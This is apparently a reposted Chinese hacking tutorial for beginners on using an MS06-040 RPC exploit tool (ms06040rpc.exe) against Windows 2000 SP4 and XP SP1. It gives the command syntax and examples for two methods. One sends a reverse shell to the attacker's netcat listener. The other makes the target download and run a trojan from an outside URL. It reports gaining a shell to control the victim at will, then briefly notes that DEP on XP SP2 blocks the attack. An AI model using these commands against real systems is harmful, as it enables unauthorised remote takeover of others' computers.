<reverse addr>: your host ip address
<reverse port >:your host listenning port
<os type(1/2)>: 1: win 2000sp4 2:win xpsp1
照顾一下小菜,我这说明一下
方法一:
命令:ms06040rpc.exe 攻击的IP 您的IP 反弹端口 系统类型
系统类型:“
“
举例:ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
方法二
命令:ms06040rpc.exe 您的木马地址系统类型
举例:ms06040rpc.exe 192.168.209.128 http://www.hackbase.com/muma.exe 1
溢出成功后就自动下载http://www.hackbase.com/muma.exe 并且执行
我们这输入ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
192.168.209.128就是我要攻击的IP,192.168.137.1就是我的IP,8888就是我刚才用Nc监听的8888端口
提示发送成功
OK,我们的得到了一个SHELL,能够随心的控制他了
很多人,包括一些大虾们都弄不懂为什么明明XPSP2和2003系统明明说了有漏洞可是不能利用
呵呵,告诉大家,其实XPSP2用了DEP技术
因为DEP能够对各种程式进行监控,阻止病毒在受保护的内存位置运行有害代码。DEP通过处理器的NX(No eXecute)
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!




